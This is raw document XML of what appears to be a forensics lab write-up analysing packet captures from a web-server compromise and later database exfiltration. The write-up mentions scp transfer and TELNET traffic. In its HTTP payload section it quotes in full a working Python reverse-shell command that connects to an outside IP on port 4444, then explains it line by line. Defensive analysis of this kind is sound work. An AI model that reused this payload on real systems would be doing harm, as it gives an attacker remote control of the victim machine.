          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl.db</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4"/>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then transfers the dumped database file to another server using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and deletes the local copy.</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5"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker exits the session, closing the connection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>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Explanation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>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 Packet Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Frame 789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is the 789th packet in the capture file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: 589 bytes captured.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Protocols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The packet uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to transmit an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP POST request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 Key Details from the Packet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A. Ethernet and IP Layer</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Source MAC Address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fe:00:00:00:01:01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Linux cooked capture, likely a virtual interface).</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Source IP Address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(the attacker’s IP address).</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Destination IP Address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134.122.33.221</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the target server, likely your web server).</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Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: TCP (used for HTTP communication).</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Ports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Source Port</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54950</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ephemeral port used by the attacker).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Destination Port</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80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HTTP port, indicating web traffic).</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B. TCP Layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Flags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PSH, ACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Push and Acknowledge flags, indicating data is being sent).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Sequence and Acknowledgment Numbers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: These are used to track the TCP session and ensure reliable data transfer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Payload Length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: 521 bytes (the actual data being sent).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C. HTTP Layer</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HTTP Method</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POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used to send data to the server).</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Request URI</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 (the attacker is targeting a PHP file named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 in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Headers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Host: 134.122.33.221</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the web server).</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User-Agent: curl/7.68.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the attacker is using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command-line tool to send the request).</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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the data is URL-encoded).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Content-Length: 331</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the length of the data being sent).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D. HTTP Payload (Malicious Command)</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most critical part of this packet is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">malicious command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here’s the breakdown:</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cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("138.68.92.163",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="142"/>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0"/>
        </w:rPr>
        <w:t xml:space="preserve">What This Command Does:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Python Reverse Shell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5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is using Python to create a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell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5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A reverse shell is a type of shell where the attacker’s machine acts as the server, and the victim’s machine connects back to it, giving the attacker control over the victim’s system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Socket Connection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s.connect(("138.68.92.163", 4444))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The victim’s machine is instructed to connect back to the attacker’s IP address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on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</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File Descriptor Duplication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os.dup2(s.fileno(),0)</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os.dup2(s.fileno(),1)</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os.dup2(s.fileno(),2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: These commands redirect the standard input (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), output (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), and error (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to the socket, effectively giving the attacker control over the victim’s terminal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Spawning a Shell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subprocess.call(["/bin/sh","-i"])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: This spawns an interactive shell (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) on the victim’s machine, which is then connected to the attacker’s machine via the socket.</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Database server pcap analysis</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I loaded the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">phldatabase.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file into wireshark</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Data server ip = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.3</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eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="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w:t xml:space="preserve">ip.addr == 10.10.1.2 &amp;&amp; ip.addr == 10.10.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.len &gt; 1000</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t xml:space="preserve">This filter is to look for interactions between the webserver and database server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a data length of over 1000 to see if there was a high volume of data moved.</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686650"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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72842" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId117"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="36866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68.00pt;height:290.29pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId117"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cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>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TELNET Protocol:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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TELNET is a  plaintext protocol used for remote access. It is inherently insecure  because it transmits data (including credentials) in cleartext.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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In the pcap file, you can see TELNET negotiation packets (e.g., Do Suppress Go Ahead, Will Terminal Type).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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Port 49522:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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This is a high-numbered port, which is often used for ephemeral (temporary) connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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However, in this case, it appears to be the source port for the TELNET session initiated by 10.10.1.2 to 10.10.1.3 on port 23 (the default TELNET port).</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rPr>
        <w:t xml:space="preserve">Follow the TCP Stream:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
